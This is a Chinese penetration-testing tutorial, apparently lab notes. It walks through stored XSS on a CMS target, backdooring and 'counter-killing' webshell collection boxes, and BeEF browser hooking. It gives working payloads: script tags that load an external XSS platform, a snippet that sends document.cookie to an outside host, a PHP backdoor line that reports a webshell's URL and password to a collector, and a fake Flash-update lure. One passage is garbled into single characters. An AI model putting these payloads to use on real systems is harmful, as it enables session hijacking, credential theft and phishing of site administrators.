一、jfdd靶场
1.下载军锋真人cs野战的源码
https://down.chinaz.com/soft/30902.htm
2本系统是单用户挂号查询系统,用户名和密码可以在初始化的时候自己设定,用户名和密码保存在config.php中,安装完可以自行修改。在安装之前首先配置一下config文件中的数据库名称密码等内容。
安装前,请必须确认根目录的config.php文件可写然后在地址栏目输入安装地址 127.0.0.1/jfdd/install.php 一步步的安装。安装 期间会设置管理员密码。
3.通过部署我们发现我们可以在订单界面输入我们的xss脚本,然后再由管理员去打开,实现我们的xss渗透。
2.实战演示
1.提交一条预约后,后端对数据进行显示
存在xss漏洞
可以看到具体要求里的元素有js代码
2.利用xss平台 获取cookie
https://xss.yt/index/User/index.html
查看代码
将代码写入交互框
<sCRiPt/SrC=//xss.yt/bQCn>
收集到了对方的cookie和一些信息
3.利用自定义xss获取cookie
使用JS代码获取Cookie
<script>var img=document.createElement("img");img.src="http://xxxx/a?"+escape(document.cookie);<script>
二、postman工具
模拟数据包的发送
在body里看网页的详细信息
三、shell箱子反杀
1.利用在webshell程序中,植入后门,形成“黑吃黑”,用有后门的木马入侵的网站也就被木马制造者利用。
就是使用别人的webshell来进行获取服务器shell,但获取shell后webshell存在的恶意代码就会把网站信息和webshell密码,和用户名发到webshell的原主人来进行信息收集,通过大量获取的网站shell来进行贩卖,而使用webshell的人就成打工仔了。
在WebShell箱子系统的首页可以看到一个api.asp的文件,如下所示 :
如果我们访问该文件,并且携带有url和pass参数,那么我们可以成功访问该文件,但是该页面中没有任何内容,如下所示:
反杀的意思就是像上面的窃取cookie道理一样通过向webshell的代码中插入窃取cookie的代码,当webshell 原注入查看沙箱时就会触发xss窃取cookie来达到反客为主!
WebShell库 https://github.com/tennc/webshell
2.搭建靶场
- 搭建一个asp的服务器,我们这里选用小旋风进行搭建
- 下载完成后解压到虚拟机里面。
- .默认端口为80 如果80端口被占用或不想用80可用记事本打开mian.boX修改至你要的端口。
- 靶场搭建将下载好的webshell箱子放在搭建好的服务器里面,这里我放到了8001端口下
将hostURL修改成对应的IP地址,重启服务即可
登录后台(账号密码都为:admin)
3.进行反杀
我们就使用一个webshell,并且在其中写入一些后门语句,从而形成后门中的后门,(在箱子里的api调用.txt文件中有如何写入代码),将该webshell上传后的地址及其管理密码进行返回:
首先模拟原webshell箱子作者进行攻击
S
E
R
V
E
R
[
‘
H
T
T
P
H
O
S
T
’
]
=
=
>
获取的是对应的
i
p
或者域名
<
b
r
/
>
_SERVER[‘HTTP_HOST’] ==> 获取的是对应的ip或者域名<br />
SERVER[‘HTTPHOST’]==>获取的是对应的ip或者域名<br/>_SERVER[‘PHP_SELF’] ==> 获取的是对应的php文件
将后门语句写入webshell中
$url=$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
echo "<script src='http://192.168.0.126:8001/api.asp?url=$url&pass=$password&id=1'></script>";
访问网址,发现有两个请求,另一个请求就是往shell箱子里发信息的
看到箱子里多了一条信息
模拟反杀
因为得到的密码会在箱子中展示,可以用利用xss漏洞
有的webshell原作者会利用加密、编码、拼接字符等技术来隐藏URL,因此我们使用别人的webshell时一定要进行代码审计
当我们代码审计获取到webshell沙箱的URL后,通过访问webshell沙箱来植入XSS代码窃取cookie
构造一条语句测试一下
测试成功
利用xss平台获取cookie
直接把第二个请求也就是往shell里发信息的请求单独拿出来,反杀箱子管理者的 人,将pass改成xss平台得代码
http://192.168.0.126:8001/api.asp?url=123.56.134.234/itsec.php&pass=
箱子管理者看到新的网址被得到后,我们也得到了管理者的cookie
利用postman工具
四、Beef结合XSS攻击
1.安装Beef-xss
最新版kali安装beef-xss
apt-get install beef-xss
如果无法安装尝试更新命令
apt-get update
安装完成之后beef-xss启动,过程中要重置密码(密码输入时不可见,用户名是beef)
启动成功
2.攻击
复制example,改成虚拟机的本机地址
)
将example填入存在xss漏洞的地方
如果网页管理者不查看订单,则不会上线浏览器
假如管理者查看订单
则beef也相应出现浏览器
3.控制
查看浏览器cookie值
cookie 存储本地,存活时间长,中小型
session 会话 储存服务端 存活时间短 大型 比如中国银行 金融等平台
PHPinfo页面上会有session
控制跳转网页
社工攻击 把flash图片地址放进去 ,骗他更新flash
用户点击会跳转GitHub上的beef
假如用户点击图片